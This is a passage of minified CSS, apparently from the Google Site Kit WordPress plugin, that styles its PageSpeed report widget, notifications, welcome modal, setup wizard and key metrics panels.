#ebeef0;gap:16px;justify-content:flex-end;padding-top:0}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__footer button.googlesitekit-cta-link{color:#6c726e}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__footer--with-action{justify-content:space-between}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row,.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__footer{align-items:center;display:flex;padding:18px 16px}@media(min-width: 600px){.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row,.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__footer{padding:18px 24px}}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row p,.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__footer p{color:#6c726e;letter-spacing:.25px}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row{gap:24px;justify-content:space-between}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row .googlesitekit-error-text p{color:#ac4220}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row--first{padding:12px 16px 8px 16px}@media(min-width: 600px){.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row--first{padding:18px 24px 12px 24px}}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row--single-item{flex-direction:row-reverse}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row--last{padding:8px 16px 12px 16px}@media(min-width: 600px){.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row--last{padding:12px 24px 18px 24px}}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row--hidden{visibility:hidden}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row--error{align-items:flex-start;flex-direction:column;padding:12px 16px 8px 16px}@media(min-width: 600px){.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-report__row--error{padding:18px 24px 12px 24px}}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed--recommendations{box-shadow:inset 0 1px 0 rgba(0,0,0,.1);display:flex;flex-direction:column;padding:16px 16px 0}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed--recommendations .googlesitekit-pagespeed-recommendations__title{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:16px;font-weight:700;letter-spacing:.1px;line-height:1.25}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed--recommendations .googlesitekit-accordion{border-top-left-radius:16px;border-top-right-radius:16px;color:#000}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed--recommendations .googlesitekit-accordion+.googlesitekit-accordion{border-radius:0}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed--recommendations .googlesitekit-accordion:last-of-type{border-bottom-left-radius:16px;border-bottom-right-radius:16px}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed--recommendations .googlesitekit-pagespeed-recommendations__title,.googlesitekit-pagespeed-widget .googlesitekit-pagespeed--recommendations .googlesitekit-accordion:last-child{margin-bottom:16px}@media(min-width: 600px){.googlesitekit-pagespeed-widget .googlesitekit-pagespeed--recommendations{padding:24px 24px 0}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed--recommendations .googlesitekit-pagespeed-recommendations__title,.googlesitekit-pagespeed-widget .googlesitekit-pagespeed--recommendations .googlesitekit-accordion:last-child{margin-bottom:24px}}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed__recommendations-cta--hidden{visibility:hidden}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed__zero-recommendations{display:flex;justify-content:center}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed__zero-recommendations svg{max-height:150px}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__content-wrapper--loading .googlesitekit-pagespeed-widget__data-src-tabs{display:flex;gap:12px}@media(min-width: 600px){.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__content-wrapper--loading .googlesitekit-pagespeed-widget__data-src-tabs{gap:20px;padding-left:24px}}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__content-wrapper--loading .googlesitekit-pagespeed-widget__device-size-tab-bar-wrapper{display:flex;padding-right:24px}.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__content-wrapper--loading .googlesitekit-pagespeed-widget__values .googlesitekit-preview-block{padding:18px 16px}@media(min-width: 600px){.googlesitekit-pagespeed-widget .googlesitekit-pagespeed-widget__content-wrapper--loading .googlesitekit-pagespeed-widget__values .googlesitekit-preview-block{padding:18px 24px}}.googlesitekit-pagespeed-report-metric .googlesitekit-pagespeed-report-metric-value-container{align-items:flex-end;display:flex;flex-direction:column;font-size:14px;justify-content:center;letter-spacing:.25px;line-height:1.43;text-align:right}.googlesitekit-pagespeed-report-metric .googlesitekit-pagespeed-report-metric-value__display-value,.googlesitekit-pagespeed-report-metric .googlesitekit-pagespeed-report-metric-value__rating{width:auto}.googlesitekit-pagespeed-report-metric .googlesitekit-pagespeed-report-metric-value__display-value{font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:16px;font-weight:700;line-height:1.25;white-space:nowrap}.googlesitekit-pagespeed-report-metric--fast{color:#46732b}.googlesitekit-pagespeed-report-metric--average{color:#895a00}.googlesitekit-pagespeed-report-metric--slow{color:#ac4220}.googlesitekit-pagespeed-report-metric__title{align-items:center;color:#161b18;column-gap:8px;display:flex;font-family:"Google Sans Display","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:16px;font-weight:700;letter-spacing:.1px;line-height:1.25}.googlesitekit-pagespeed-report-metric__title .googlesitekit-info-tooltip{display:inline-flex}.googlesitekit-pagespeed-report-metric__badge{margin-left:6px;vertical-align:bottom}.googlesitekit-pagespeed-report-metric__hint-text{color:#6c726e;letter-spacing:.25px;line-height:1.5;margin-top:.5em}.googlesitekit-pagespeed-report__row--unavailable .googlesitekit-pagespeed-report-metric__title,.googlesitekit-pagespeed-report__row--unavailable .googlesitekit-pagespeed-report-metric__description,.googlesitekit-pagespeed-report__row--unavailable .googlesitekit-pagespeed-report-metric-value{color:#999f9b}.googlesitekit-subtle-notification{align-items:flex-start;background-color:#b8e5ca;border-radius:16px;color:#265c3b;display:flex;flex-direction:column;gap:10px;padding:14px 16px}@media(min-width: 600px){.googlesitekit-subtle-notification{align-items:center;flex-direction:row;gap:16px;padding:14px 24px}}.googlesitekit-subtle-notification .googlesitekit-subtle-notification__icon{display:flex}.googlesitekit-subtle-notification .googlesitekit-subtle-notification__content{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;font-size:16px;font-weight:500;line-height:1.33}@media(min-width: 600px){.googlesitekit-subtle-notification .googlesitekit-subtle-notification__content{flex:1;font-size:18px}}.googlesitekit-subtle-notification .googlesitekit-subtle-notification__content p{margin:0 0 10px}@media(min-width: 600px){.googlesitekit-subtle-notification .googlesitekit-subtle-notification__content p{margin:0}}.googlesitekit-subtle-notification .googlesitekit-subtle-notification__content p>a{color:inherit;-webkit-text-decoration:underline;text-decoration:underline}.googlesitekit-subtle-notification .mdc-button{margin:0 auto;min-height:32px;padding:6px 16px}.googlesitekit-subtle-notification .mdc-button.mdc-button--tertiary:not(:disabled){color:#265c3b}@media(min-width: 600px){.googlesitekit-subtle-notification .mdc-button{margin:0}}.googlesitekit-subtle-notification .mdc-button.mdc-button--raised{padding:6px 16px}.googlesitekit-subtle-notification .googlesitekit-subtle-notification__action{align-items:center;display:flex;flex-wrap:wrap;gap:16px;justify-content:end;width:100%}@media(min-width: 600px){.googlesitekit-subtle-notification .googlesitekit-subtle-notification__action{justify-content:initial;width:initial}}.googlesitekit-subtle-notification .googlesitekit-subtle-notification__action .mdc-button{margin:0}.googlesitekit-subtle-notification p.googlesitekit-subtle-notification__secondary_description{font-weight:400}.googlesitekit-subtle-notification .googlesitekit-subtle-notification__cta:not(.googlesitekit-subtle-notification__cta--spinner__running) svg{margin-inline-start:6px}.googlesitekit-subtle-notification .googlesitekit-subtle-notification__cta.googlesitekit-subtle-notification__cta--spinner__running .mdc-button__label{margin-left:3px}.googlesitekit-plugin .googlesitekit-welcome-modal .mdc-dialog__surface{overflow:hidden}.googlesitekit-plugin .googlesitekit-welcome-modal .mdc-dialog__container{max-width:491px}.googlesitekit-plugin .googlesitekit-welcome-modal__graphic{background-image:linear-gradient(to bottom, #d0fbe1, #fff);max-height:200px;position:relative}.googlesitekit-plugin .googlesitekit-welcome-modal__graphic>svg{max-width:491px}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button{position:absolute;right:12px;top:12px}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button{height:36px;min-height:36px;min-width:36px;width:36px}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:not(:disabled){background-color:#93c9a8}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover::before{opacity:.04}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:not(:disabled){color:#fff}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover:not(:disabled),.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active:not(:disabled),.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus:not(:disabled){background-color:#b8e5ca}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover:not(:disabled),.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active:not(:disabled),.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus:not(:disabled){color:rgba(0,0,0,.87);color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover::after,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active::after,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus::after{background-color:rgba(0,0,0,.87)}@supports not (-ms-ime-align: auto){.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover::after,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active::after,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus::after{background-color:var(--mdc-theme-text-primary-on-light, rgba(0, 0, 0, 0.87))}}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover:hover::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active:hover::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus:hover::before{opacity:.04}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active.mdc-ripple-upgraded--background-focused::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus:not(.mdc-ripple-upgraded):focus::before,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active:not(.mdc-ripple-upgraded)::after,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active:not(.mdc-ripple-upgraded):active::after,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover.mdc-ripple-upgraded,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active.mdc-ripple-upgraded,.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:hover:not(:disabled),.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:active:not(:disabled),.googlesitekit-plugin .googlesitekit-welcome-modal__close-button.mdc-button:focus:not(:disabled){color:#fff}.googlesitekit-plugin .googlesitekit-welcome-modal__close-button svg{position:absolute}.googlesitekit-plugin .googlesitekit-welcome-modal__text{padding:0 16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-welcome-modal__text{padding:0 24px}}.googlesitekit-plugin .googlesitekit-welcome-modal__title{margin:25px 0 0}.googlesitekit-plugin .googlesitekit-welcome-modal__description{margin:8px 0 0}.googlesitekit-plugin .googlesitekit-welcome-modal__footer.mdc-dialog__actions{border-top:none;margin-top:23px;padding:0 16px 16px 16px}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-welcome-modal__footer.mdc-dialog__actions{padding:0 24px 24px 24px}}.googlesitekit-wizard{padding-top:10px}@media(min-width: 600px){.googlesitekit-wizard{padding-left:10px;padding-right:10px}}.googlesitekit-wizard .googlesitekit-opt-in{margin-bottom:8px;margin-top:8px}.googlesitekit-wizard .googlesitekit-wizard__asterisk{color:#ac4220}.googlesitekit-wizard .googlesitekit-wizard__asterisk--space{margin-left:3px}.googlesitekit-wizard .googlesitekit-wizard__error-text{color:#ac4220;font-weight:500}.googlesitekit-wizard-auth{border-bottom:1px solid #ebeef0;display:flex;padding-bottom:40px}.googlesitekit-wizard-auth .googlesitekit-wizard-auth__image{border-radius:50%;display:block;flex:0 0 auto;height:32px;margin-right:16px;width:32px}@media(min-width: 600px){.googlesitekit-wizard-auth .googlesitekit-wizard-auth__image{height:64px;width:64px}}@media(min-width: 960px){.googlesitekit-wizard-auth .googlesitekit-wizard-auth__image{margin-right:24px}}.googlesitekit-wizard-auth .googlesitekit-wizard-auth__title{margin:0 0 10px}.googlesitekit-wizard-auth .googlesitekit-wizard-auth__text{margin:0}.googlesitekit-wizard-component .googlesitekit-wizard-component__title{display:inline-block;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;margin:0 0 10px}.googlesitekit-wizard-component .googlesitekit-wizard-component__logo{display:inline-block;margin:0 16px 8px 0;vertical-align:bottom}.googlesitekit-wizard-component .googlesitekit-wizard-component__logo img{display:block}.googlesitekit-wizard-component .googlesitekit-wizard-component__description{margin:0 0 17px 0}@media(min-width: 960px){.googlesitekit-wizard-component .googlesitekit-wizard-component__description{margin:0 0 29px 0}}.googlesitekit-wizard-component .googlesitekit-wizard-component__inputs{align-items:center;display:flex;flex-wrap:wrap;margin:0}.googlesitekit-wizard-component .googlesitekit-wizard-component__inputs>div{margin:16px 16px 16px 0}@media(min-width: 960px){.googlesitekit-wizard-component .googlesitekit-wizard-component__inputs>div{margin:24px 24px 24px 0}}.googlesitekit-wizard-component .googlesitekit-wizard-component__inputs--multiline{display:block}.googlesitekit-wizard-component .googlesitekit-wizard-component__inputs--multiline>div{margin:0;width:100%}.googlesitekit-wizard-component .googlesitekit-wizard-component__action{margin:24px 0 0 0}@media(min-width: 600px){.googlesitekit-wizard-component .googlesitekit-wizard-component__action{align-items:center;display:flex;justify-content:space-between}}@media(min-width: 960px){.googlesitekit-wizard-component .googlesitekit-wizard-component__action{margin:36px 0 0 0}}.googlesitekit-wizard-component .googlesitekit-wizard-component__skip{display:flex;flex:1 1 auto;justify-content:space-between;margin-top:16px}@media(min-width: 600px){.googlesitekit-wizard-component .googlesitekit-wizard-component__skip{margin-left:16px;margin-top:0}}@media(min-width: 960px){.googlesitekit-wizard-component .googlesitekit-wizard-component__skip{margin-left:24px}}.googlesitekit-wizard-component .googlesitekit-wizard-component__steps{font-size:12px;letter-spacing:.2px}.googlesitekit-wizard-component-nav{align-items:center;display:flex}.googlesitekit-wizard-component-nav .googlesitekit-wizard-component-nav__button{cursor:pointer}.googlesitekit-wizard-component-nav .googlesitekit-wizard-component-nav__icon{display:inline-block;opacity:.6}.googlesitekit-wizard-component-nav .googlesitekit-wizard-component-nav__icon:focus,.googlesitekit-wizard-component-nav .googlesitekit-wizard-component-nav__icon:active,.googlesitekit-wizard-component-nav .googlesitekit-wizard-component-nav__icon:hover{opacity:1}.googlesitekit-wizard-component-nav .googlesitekit-wizard-component-nav__icon--reverse{transform:rotate(180deg)}.googlesitekit-wizard-module{border:1px solid #ebeef0;height:100%;padding:16px;width:100%}@media(min-width: 960px){.googlesitekit-wizard-module{padding:24px}}.googlesitekit-wizard-module .googlesitekit-wizard-module__logo{align-items:flex-end;display:flex;height:36px}.googlesitekit-wizard-module .googlesitekit-wizard-module__logo img{display:block}.googlesitekit-wizard-module .googlesitekit-wizard-module__title{margin:15px 0 10px}.googlesitekit-wizard-module .googlesitekit-wizard-module__text{font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0}.googlesitekit-wizard-module .googlesitekit-wizard-module__switch{float:right}.googlesitekit-wizard-module .googlesitekit-wizard-module__switch .spinner{margin-top:-5px}.googlesitekit-wizard-module .googlesitekit-wizard-module__cta{font-size:12px;letter-spacing:.2px}.googlesitekit-wizard-progress{background-color:#fff}@media(min-width: 600px){.googlesitekit-wizard-progress{padding-left:10px;padding-right:10px}}@media(min-width: 600px){.googlesitekit-wizard-progress{border-bottom:1px solid #ebeef0}}.googlesitekit-wizard-progress .googlesitekit-wizard-progress__subtitle{margin:10px 0 17px}.googlesitekit-wizard-progress .googlesitekit-wizard-progress__title{margin:0 0 10px}@media(min-width: 600px){.googlesitekit-wizard-progress .googlesitekit-wizard-progress__title{margin:0 0 30px}}.googlesitekit-wizard-progress .googlesitekit-wizard-progress__description{font-size:12px;letter-spacing:.2px;line-height:1.33;margin:0 0 10px}@media(min-width: 600px){.googlesitekit-wizard-progress .googlesitekit-wizard-progress__description{margin:0 0 30px}}.googlesitekit-wizard-progress .googlesitekit-wizard-progress__steps{display:flex;padding:16px}@media(min-width: 960px){.googlesitekit-wizard-progress .googlesitekit-wizard-progress__steps{padding:24px 0 0 0}}.googlesitekit-plugin .googlesitekit-wizard-progress-step{display:none;flex:1;flex-wrap:nowrap;text-align:center}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-wizard-progress-step{display:block;margin-bottom:40px}}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number-wrapper{position:relative}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number-wrapper::before{position:absolute;top:50%;transform:translateY(-50%);background-color:#ebeef0;content:"";display:block;height:2px;left:-16px;right:-16px}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number-wrapper::before{left:-24px;right:-24px}}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number{background-color:#ebeef0;border:15px solid #fff;border-radius:50%;color:#333935;font-size:14px;height:54px;letter-spacing:.25px;line-height:1.43;margin:0 auto;position:relative;width:54px;z-index:2}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number--inprogress{background-color:#446199;color:#fff}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number--warning{background-color:#895a00;color:#fff}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number--warning svg{color:#fff}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number--error{background-color:#ac4220;color:#fff}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number--error svg{color:#fff}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number--completed{background-color:#46732b;color:#fff}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number--completed svg{color:#fff}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number-text--warning,.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number-text--error,.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number-text--completed{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__number-icon{align-items:center;display:flex;height:100%;justify-content:center}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__text{color:#5f6561;font-size:14px;font-weight:500;letter-spacing:.25px;margin:0}.googlesitekit-plugin .googlesitekit-wizard-progress-step .googlesitekit-wizard-progress-step__text span{color:#ac4220;display:inline-block;margin-left:5px}.googlesitekit-plugin .googlesitekit-wizard-progress-step--current{display:block}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-wizard-progress-step--1 .googlesitekit-wizard-progress-step__number-wrapper::after,.googlesitekit-plugin .googlesitekit-wizard-progress-step--completeSetup .googlesitekit-wizard-progress-step__number-wrapper::after{position:absolute;top:50%;transform:translateY(-50%);background-color:#fff;content:"";display:block;height:4px}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-wizard-progress-step--1 .googlesitekit-wizard-progress-step__number-wrapper::after{left:-16px;right:50%}}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-wizard-progress-step--1 .googlesitekit-wizard-progress-step__number-wrapper::after{left:-24px}}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-wizard-progress-step--completeSetup .googlesitekit-wizard-progress-step__number-wrapper::after{left:50%;right:-16px}}@media(min-width: 960px){.googlesitekit-plugin .googlesitekit-wizard-progress-step--completeSetup .googlesitekit-wizard-progress-step__number-wrapper::after{right:-24px}}.googlesitekit-wizard-step{background-color:#fff;overflow:hidden;padding-bottom:16px;padding-top:16px}@media(min-width: 600px){.googlesitekit-wizard-step{padding-left:10px;padding-right:10px}}@media(min-width: 960px){.googlesitekit-wizard-step{padding-bottom:24px;padding-top:24px}}.googlesitekit-wizard-step .googlesitekit-wizard-step__title{margin:0 0 10px}.googlesitekit-wizard-step .googlesitekit-wizard-step__text{margin:0}.googlesitekit-wizard-step .googlesitekit-wizard-step__subtitle{margin:16px 0 0 0}@media(min-width: 960px){.googlesitekit-wizard-step .googlesitekit-wizard-step__subtitle{margin-top:24px}}.googlesitekit-wizard-step .googlesitekit-wizard-step__inputs{align-items:center;display:flex;flex-wrap:wrap;margin:0}.googlesitekit-wizard-step .googlesitekit-wizard-step__inputs>div{margin:16px 16px 16px 0}@media(min-width: 960px){.googlesitekit-wizard-step .googlesitekit-wizard-step__inputs>div{margin:24px 24px 24px 0}}.googlesitekit-wizard-step .googlesitekit-wizard-step__inputs>.googlesitekit-setup-module__input{margin:1em 0}.googlesitekit-wizard-step .googlesitekit-wizard-step__inputs--multiline{display:block}.googlesitekit-wizard-step .googlesitekit-wizard-step__inputs--multiline>div{margin:0;width:100%}.googlesitekit-wizard-step .googlesitekit-wizard-step__action{margin-top:16px}@media(min-width: 960px){.googlesitekit-wizard-step .googlesitekit-wizard-step__action{margin-top:24px}}.googlesitekit-wizard-step .googlesitekit-wizard-step__action--justify{align-items:center;display:flex;flex-wrap:wrap;justify-content:space-between;margin-top:0}.googlesitekit-wizard-step .googlesitekit-wizard-step__action--justify>*:first-child{margin-right:16px;margin-top:16px}@media(min-width: 960px){.googlesitekit-wizard-step .googlesitekit-wizard-step__action--justify>*:first-child{margin-right:24px;margin-top:24px}}.googlesitekit-wizard-step .googlesitekit-wizard-step__action--justify>*:last-child{flex:0 0 auto;margin-top:16px}@media(min-width: 960px){.googlesitekit-wizard-step .googlesitekit-wizard-step__action--justify>*:last-child{margin-top:24px}}.googlesitekit-wizard-step .googlesitekit-wizard-step__back{margin-left:8px}.googlesitekit-plugin .googlesitekit-km-connect-ga4-cta .googlesitekit-banner__title{color:#ac4220}@media(max-width: 959px){.googlesitekit-plugin .googlesitekit-km-connect-ga4-cta .googlesitekit-banner__content{text-align:center}}.googlesitekit-plugin .googlesitekit-key-metrics-setup{margin-bottom:30px}@media(min-width: 1500px){.googlesitekit-plugin .googlesitekit-key-metrics-setup .googlesitekit-user-input__select-options-wrapper{padding-left:unset}}.googlesitekit-plugin .googlesitekit-key-metrics-setup .googlesitekit-user-input__select-options-wrapper .googlesitekit-user-input__select-option{border-bottom:1px solid #ebeef0}.googlesitekit-plugin .googlesitekit-key-metrics-setup .googlesitekit-user-input__select-options-wrapper .googlesitekit-user-input__select-option:first-child{border-top:1px solid #ebeef0}.googlesitekit-plugin .googlesitekit-key-metrics-setup .googlesitekit-user-input__footer{flex-direction:row}.googlesitekit-plugin .googlesitekit-key-metrics-setup__title{margin-top:0}.googlesitekit-plugin .googlesitekit-key-metrics-setup__heading{margin-bottom:20px}.googlesitekit-plugin .googlesitekit-key-metrics-setup__heading h2{margin:0 0 6px}.googlesitekit-plugin .googlesitekit-key-metrics-setup__heading p{color:#6c726e}@media(max-width: 600px){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .mdc-layout-grid__cell--span-2-phone{width:calc(100% - 16px);width:calc(100% - var(--mdc-layout-grid-gutter-phone, 16px))}@supports(display: grid){.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .mdc-layout-grid__cell--span-2-phone{width:auto;grid-column-end:span 4}}}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-header__title{align-items:center;display:flex}.googlesitekit-plugin .googlesitekit-widget-area--mainDashboardKeyMetricsPrimary .googlesitekit-widget-area-header__title .googlesitekit-new-badge{margin-left:12px}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__chip-item,.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items .mdc-tab{background-color:#ebeef0;color:#161b18;font-size:12px;font-weight:500;min-height:28px;padding:6px 14px;--mdc-ripple-fg-opacity: 0}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items{background:#fff;display:flex;flex-wrap:nowrap;gap:12px;left:0;margin:0 16px 15px;overflow:auto;position:sticky;top:0;white-space:nowrap;z-index:1}@media(min-width: 600px){.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items{flex-wrap:wrap;margin:0 25px 25px;overflow:hidden;white-space:unset}}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items .mdc-tab-scroller__scroll-content{gap:10px}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items .mdc-tab{height:unset;line-height:unset}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items .mdc-tab.mdc-tab--active{background-color:#b8e5ca}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items .mdc-tab .mdc-tab-indicator>.mdc-tab-indicator__content{display:none}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__tab-items .mdc-tab .mdc-tab__content{position:initial}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__chip-item{overflow:visible}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__chip-item svg{margin-right:7px}.googlesitekit-plugin .googlesitekit-chip-tab-group .googlesitekit-chip-tab-group__chip-item-new-dot{align-items:center;background-color:#fff;border-radius:50%;display:flex;height:10px;justify-content:center;position:absolute;right:0;top:0;width:10px}.googlesitekit-plugin 